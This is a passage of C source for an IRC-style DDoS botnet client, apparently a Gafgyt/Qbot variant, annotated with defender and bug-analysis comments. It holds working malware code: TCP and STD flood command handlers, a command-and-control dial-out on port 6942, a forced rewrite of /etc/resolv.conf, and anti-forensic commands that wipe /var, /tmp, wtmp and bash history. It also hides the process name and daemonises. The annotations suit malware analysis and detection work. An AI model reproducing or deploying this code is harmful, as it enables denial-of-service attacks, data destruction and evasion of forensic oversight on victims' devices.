  1912. if(!strcmp(argv[0], "TCP"))
  1913. {
  1914. //!* TCP TARGET PORT TIME FLAGS PACKETSIZE POLLINTERVAL
  1915. if(argc < 6 || atoi(argv[3]) == -1 || atoi(argv[2]) == -1 || (argc > 5 && atoi(argv[5]) < 0) || (argc == 7 && atoi(argv[6]) < 1))
  1916. {
  1917. return;
  1918. }
  1919. unsigned char *ip = argv[1];
  1920. int port = atoi(argv[2]);
  1921. int time = atoi(argv[3]);
  1922. unsigned char *flags = argv[4];
  1923. int pollinterval = argc == 7 ? atoi(argv[6]) : 10;
  1924. int packetsize = argc > 5 ? atoi(argv[5]) : 0;
  1925. int spoofed = 32;
  1926. if(strstr(ip, ",") != NULL) {
  1927. unsigned char *hi = strtok(ip, ",");
  1928. while(hi != NULL) {
  1929. if(!listFork()) {
  1930. SendTCP(hi, port, time, flags, packetsize, pollinterval, spoofed);
  1931. _exit(0);
  1932. }
  1933. hi = strtok(NULL, ",");
  1934. }
  1935. } else {
  1936. if (listFork())
  1937. {
  1938. return;
  1939. }
  1940. SendTCP(ip, port, time, flags, packetsize, pollinterval, spoofed);
  1941. _exit(0);
  1942. }
  1943. }
  1944. if(!strcmp(argv[0], "STD"))
  1945. {
  1946. //!* STD TARGET PORT TIME
  1947. if(argc < 4 || atoi(argv[2]) < 1 || atoi(argv[3]) < 1)
  1948. {
  1949. return;
  1950. }
  1951. unsigned char *ip = argv[1];
  1952. int port = atoi(argv[2]);
  1953. int time = atoi(argv[3]);
  1954. if(strstr(ip, ",") != NULL)
  1955. {
  1956. unsigned char *hi = strtok(ip, ",");
  1957. while(hi != NULL)
  1958. {
  1959. if(!listFork())
  1960. {
  1961. SendSTD(hi, port, time);
  1962. _exit(0);
  1963. }
  1964. hi = strtok(NULL, ",");
  1965. }
  1966. } else {
  1967. if (listFork())
  1968. {
  1969. return;
  1970. }
  1971. SendSTD(ip, port, time);
  1972. _exit(0);
  1973. }
  1974. }
  1975. if(!strcmp(argv[0], "KILLATTK"))
  1976. {
  1977. int killed = 0;
  1978. unsigned long i;
  1979. for (i = 0; i < numpids; i++)
  1980. {
  1981. if (pids[i] != 0 && pids[i] != getpid())
  1982. {
  1983. kill(pids[i], 9);
  1984. killed++;
  1985. }
  1986. }
  1987. if(killed > 0)
  1988. {
  1989. //
  1990. } else {
  1991. //
  1992. }
  1993. }
  1994. if(!strcmp(argv[0], "LOLNOGTFO"))
  1995. {
  1996. exit(0);
  1997. }
  1998. if(!strcmp(argv[0], "UPDATE"))
  1999. {
  2000. RemoveTempDirs();
  2001. sockprintf(mainCommSock, "[Updating] [%s:%s]", getBuild(), getEndianness());
  2002. }
  2003. }
  // Rotate to the next entry of the compile-time commServer[] list and open a
  // TCP session to it. Returns 0 on success, 1 when connectTimeout() fails.
  // Defender note: this is the bot's command-and-control dial-out. When the
  // list entry carries no ":port" suffix the port is 6942, so outbound TCP to
  // the listed hosts, or to an unexpected host on 6942 from an embedded device,
  // is the network indicator to alert on.
  2004. int initConnection() {
  2005. unsigned char server[512];
  2006. memset(server, 0, 512);
  // Any earlier session is dropped first and the global reset, so a later call
  // does not close a stale descriptor.
  2007. if(mainCommSock) { close(mainCommSock); mainCommSock = 0; }
  // Round-robin over SERVER_LIST_SIZE entries (macro defined at the top of the
  // file); currentServer is a global declared outside this excerpt.
  2008. if(currentServer + 1 == SERVER_LIST_SIZE) currentServer = 0;
  2009. else currentServer++;
  // Unbounded strcpy into a 512-byte buffer; the source strings are fixed at
  // compile time, so this only overflows on a malformed build.
  2010. strcpy(server, commServer[currentServer]);
  2011. int port = 6942;
  // Optional "host:port" form: atoi() yields 0 for a non-numeric suffix, and the
  // ':' is overwritten with NUL so server[] is left holding only the host part.
  2012. if(strchr(server, ':') != NULL) {
  2013. port = atoi(strchr(server, ':') + 1);
  2014. *((unsigned char *)(strchr(server, ':'))) = 0x0;
  2015. }
  // socket() is not checked; on failure -1 is passed straight to connectTimeout().
  2016. mainCommSock = socket(AF_INET, SOCK_STREAM, 0);
  // connectTimeout() is defined elsewhere in the file; 30 is presumably the
  // timeout in seconds — confirm against its definition.
  2017. if(!connectTimeout(mainCommSock, server, port, 30)) return 1;
  2018. return 0;
  2019. }
  // Overwrite /etc/resolv.conf with two hard-coded nameserver lines (8.8.8.8 and
  // 8.8.4.4). Defender note: truncating and rewriting resolv.conf is a durable
  // host artifact; file-integrity monitoring on /etc/resolv.conf, or a device
  // whose DNS configuration suddenly points at Google resolvers instead of its
  // usual local/ISP resolver, is the indicator.
  2020. void UpdateNameSrvs() {
  // The file is opened (and truncated) before the existence check below, and
  // the descriptor is kept in a uint16_t: a failed open() returns -1, which this
  // type turns into 65535, so the failure is never detected.
  2021. uint16_t fhandler = open("/etc/resolv.conf", O_WRONLY | O_TRUNC);
  2022. if (access("/etc/resolv.conf", F_OK) != -1) {
  2023. const char* resd = "nameserver 8.8.8.8\nnameserver 8.8.4.4\n";
  2024. size_t resl = strlen(resd);
  // The return value of write() is ignored, so short or failed writes are silent.
  2025. write(fhandler, resd, resl);
  // On the "file missing" path the function returns without close(fhandler).
  2026. } else { return; }
  2027. close(fhandler);
  2028. }
  // Anti-forensics: four shell commands, each run through system() and so each
  // in its own /bin/sh child, that delete temporary directories, the login
  // record file /var/log/wtmp and the bash history file. Called in main() right
  // after the C2 connection is made and again on the "UPDATE" command.
  // Defender note: wholesale removal of /var/* and wtmp is itself a loud
  // indicator; logs shipped off-host (remote syslog) survive it, local ones do
  // not. None of the return values are checked.
  2029. void RemoveTempDirs() {
  2030. system("rm -rf /tmp/* /var/* /var/run/* /var/tmp/*");
  2031. system("rm -rf /var/log/wtmp");
  // "~" is expanded by the child shell from its HOME, so which file this hits
  // depends on the environment the bot was started with.
  2032. system("rm -rf ~/.bash_history");
  // history is a shell builtin acting on the child shell's own history list; in
  // a non-interactive "sh -c" child this presumably leaves the on-disk history
  // untouched — confirm for the target shell.
  2033. system("history -c;history -w");
  2034. }
  // Report the host byte order as a string ("BIG", "LITTLE" or "UNKNOWN") by
  // storing the bytes 00 01 02 03 into a uint32_t through a union and reading
  // the resulting value. Used only for the banners the bot sends to its C2.
  // Note: the function is declared to return int, yet every return statement
  // yields a string literal and the callers print the result with "%s" (see
  // main()); the declared return type is the mismatch, not the callers.
  2035. int getEndianness(void)
  2036. {
  2037. union
  2038. {
  2039. uint32_t vlu;
  2040. uint8_t data[sizeof(uint32_t)];
  2041. } nmb;
  2042. nmb.data[0] = 0x00;
  2043. nmb.data[1] = 0x01;
  2044. nmb.data[2] = 0x02;
  2045. nmb.data[3] = 0x03;
  2046. switch (nmb.vlu)
  2047. {
  // 0x00010203: byte 0 ended up most significant.
  2048. case UINT32_C(0x00010203):
  2049. return "BIG";
  // 0x03020100: byte 0 ended up least significant.
  2050. case UINT32_C(0x03020100):
  2051. return "LITTLE";
  // The two remaining cases are mixed (word-swapped) orderings, folded into the
  // same two labels.
  2052. case UINT32_C(0x02030001):
  2053. return "BIG";
  2054. case UINT32_C(0x01000302):
  2055. return "LITTLE";
  2056. default:
  2057. return "UNKNOWN";
  2058. }
  2059. }
  // Entry point of the bot: hide the process name, daemonize with a double
  // fork, drop to "/", then loop connecting to the C2 and dispatching the
  // commands it receives to processCmd(). Defender note: the process-listing
  // indicators are a blank /proc/<pid>/cmdline and an empty comm name, and a
  // process that is re-forked every 5 seconds while the C2 is unreachable.
  // The signature uses unsigned char *argv[] rather than the standard char *.
  2060. int main(int argc, unsigned char *argv[]) {
  2061. const char *lolsuckmekid = "";
  2062. if(SERVER_LIST_SIZE <= 0) return 0;
  // strncpy from "" NUL-pads strlen(argv[0]) bytes, zeroing the original
  // argument string in place, then argv[0] is pointed at an empty literal.
  2063. strncpy(argv[0],"",strlen(argv[0]));
  2064. argv[0] = "";
  // Sets the kernel comm name to the empty string. PR_SET_NAME is a hand-defined
  // macro at the top of the file and no <sys/prctl.h> include is visible, so
  // prctl() is called without a prototype here.
  2065. prctl(PR_SET_NAME, (unsigned long) lolsuckmekid, 0, 0, 0);
  // Both the libc PRNG and the file's own init_rand() (defined elsewhere) are
  // seeded from time XOR pid.
  2066. srand(time(NULL) ^ getpid());
  2067. init_rand(time(NULL) ^ getpid());
  2068. pid_t pid1;
  2069. pid_t pid2;
  2070. int status;
  // Double fork: the original process waits for its child and exits, that child
  // forks again and exits, and only the grandchild reaches the code below.
  2071. if (pid1 = fork()) {
  2072. waitpid(pid1, &status, 0);
  2073. exit(0);
  2074. } else if (!pid1) {
  2075. if (pid2 = fork()) {
  2076. exit(0);
  2077. } else if (!pid2) {
  2078. } else {
  2079. }
  2080. } else {
  2081. }
  // None of the three calls below are checked; setuid/seteuid(0) only matter if
  // the bot already runs with the privilege to regain root.
  2082. chdir("/");
  2083. setuid(0);
  2084. seteuid(0);
  // Writes to a dead C2 socket must not kill the process.
  2085. signal(SIGPIPE, SIG_IGN);
  2086. while(1) {
  // Each attempt runs in a fresh child; the forking side falls through to the
  // "return 0" at the bottom of the loop body and exits, so the loop never
  // iterates twice in the same process.
  2087. if(fork() == 0) {
  // On connect failure this child sleeps, loops, and forks again (then exits
  // itself), giving the 5-second re-spawn chain noted above. Once a connection
  // has been made and later lost, control leaves this block and the process
  // exits instead of reconnecting.
  2088. if(initConnection()) { sleep(5); continue; }
  // Check-in banner sent to the C2 (note the unbalanced closing bracket in the
  // literal). ourIP is a global set outside this excerpt.
  2089. sockprintf(mainCommSock, "[ CONNECTION ] IP: %s || Arch: %s || Type: %s]", inet_ntoa(ourIP), getBuild(), getEndianness());
  2090. UpdateNameSrvs();
  2091. RemoveTempDirs();
  2092. char commBuf[4096];
  2093. int got = 0;
  2094. int i = 0;
  // recvLine() is defined elsewhere; -1 ends the session. Before each line is
  // handled, finished attack children are reaped and dropped from the global
  // pids[]/numpids bookkeeping (declared outside this excerpt).
  2095. while((got = recvLine(mainCommSock, commBuf, 4096)) != -1) {
  2096. for (i = 0; i < numpids; i++) if (waitpid(pids[i], NULL, WNOHANG) > 0) {
  2097. unsigned int *newpids, on;
  2098. for (on = i + 1; on < numpids; on++) pids[on-1] = pids[on];
  2099. pids[on - 1] = 0;
  2100. numpids--;
  // The array is reallocated by hand at every reap; the malloc result is not
  // checked before it is copied into.
  2101. newpids = (unsigned int*)malloc((numpids + 1) * sizeof(unsigned int));
  2102. for (on = 0; on < numpids; on++) newpids[on] = pids[on];
  2103. free(pids);
  2104. pids = newpids;
  2105. }
  // If recvLine() can return 4096 this writes one past commBuf — check its
  // contract. trim() is defined elsewhere in the file.
  2106. commBuf[got] = 0x00;
  2107. trim(commBuf);
  // Keep-alive and duplicate-instance handling at the start of the line.
  2108. if(strstr(commBuf, "PING") == commBuf) { // PING
  2109. continue;
  2110. }
  2111. if(strstr(commBuf, "DUP") == commBuf) exit(0); // DUP
  2112. unsigned char *message = commBuf;
  // Command lines have the shape "!<mask> <COMMAND> <args...>". The mask is
  // cut off and skipped, trailing CR/LF are stripped, and the command word is
  // uppercased in place (toupper() is used without a visible <ctype.h> include).
  2113. if(*message == '!') {
  2114. unsigned char *nickMask = message + 1;
  2115. while(*nickMask != ' ' && *nickMask != 0x00) nickMask++;
  2116. if(*nickMask == 0x00) continue;
  2117. *(nickMask) = 0x00;
  2118. nickMask = message + 1;
  2119. message = message + strlen(nickMask) + 2;
  2120. while(message[strlen(message) - 1] == '\n' || message[strlen(message) - 1] == '\r') message[strlen(message) - 1] = 0x00;
  2121. unsigned char *command = message;
  2122. while(*message != ' ' && *message != 0x00) message++;
  2123. *message = 0x00;
  2124. message++;
  2125. unsigned char *tmpcommand = command;
  2126. while(*tmpcommand) { *tmpcommand = toupper(*tmpcommand); tmpcommand++; }
  // params[0] is the command word; the remaining space-separated tokens are
  // copied into heap buffers. The array holds 10 pointers but paramsCount is
  // never compared with that size, so a line with more than nine arguments
  // writes past the end of params[].
  2127. unsigned char *params[10];
  2128. int paramsCount = 1;
  2129. unsigned char *pch = strtok(message, " ");
  2130. params[0] = command;
  2131. while(pch) {
  2132. if(*pch != '\n') {
  2133. params[paramsCount] = (unsigned char *)malloc(strlen(pch) + 1);
  2134. memset(params[paramsCount], 0, strlen(pch) + 1);
  2135. strcpy(params[paramsCount], pch);
  2136. paramsCount++;
  2137. }
  2138. pch = strtok(NULL, " ");
  2139. }
  // Dispatch to the command table defined earlier in the file, then release the
  // copied arguments (params[0] points into commBuf and is not freed).
  2140. processCmd(paramsCount, params);
  2141. if(paramsCount > 1) {
  2142. int q = 1;
  2143. for(q = 1; q < paramsCount; q++) {
  2144. free(params[q]);
  2145. }
  2146. }
  2147. }
  2148. }
  2149. }
  2150. return 0;
  2151. }
  2152. }